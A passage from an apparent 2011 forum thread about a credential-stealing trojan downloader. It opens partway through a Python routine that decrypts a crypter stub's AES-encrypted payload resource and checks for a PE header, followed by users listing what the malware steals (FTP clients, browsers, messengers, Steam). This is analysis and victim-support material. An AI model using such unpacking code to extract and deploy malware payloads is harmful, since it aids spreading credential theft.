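    return data[:-n]


def decrypt_payload(ciphertext: bytes, settings: str) -> bytes:
    """Decrypt the 'crypted' resource for the AES mode and sanity-check the result.

    Uses the 'cryptography' package (assumption: it is installed). The stub
    only ever uses ECB, so no IV is involved. The password is taken as ASCII,
    which matches Encoding.Default for the password seen in this thread.
    """
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    cfg = parse_settings(settings)
    if cfg["encryption"] != "AES":
        raise NotImplementedError("only the AES mode is handled here: " + cfg["encryption"])
    key = derive_key(cfg["password"].encode("ascii"))
    dec = Cipher(algorithms.AES(key), modes.ECB()).decryptor()
    plain = strip_pkcs7(dec.update(ciphertext) + dec.finalize())
    if plain[:2] != b"MZ":
        raise ValueError("decrypted data is not a PE file; check password and mode")
    return plain
```

Feed `decrypt_payload` the raw `crypted` resource extracted from the stub together with the settings string from the `settings` resource; a padding error or a missing MZ header means the password or mode was wrong.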
     
  #7 18 February 2011
    just great

    nothing in autostart
     
  #8 19 February 2011
    Re: Win32.Trojan-Downloader.MSIL.Agent.xf.3.a

    yeah, then your system should already be clean.

    Here's another short list of what it steals:
    - FlashFXP/SmartFTP
    - Opera/Firefox/Chrome/IE
    - MSN/Trillian
    - Steam

    The list isn't complete, but FlashFXP in particular should interest you^^
     
  #9 19 February 2011
    Re: Win32.Trojan-Downloader.MSIL.Agent.xf.3.a

    well, he can't do anything with the ftp data
    icq is already changed, at least the UIN where I know the pw myself
    trillian astra doesn't even offer the option to change the pw, great service...

    but thanks for the list
     
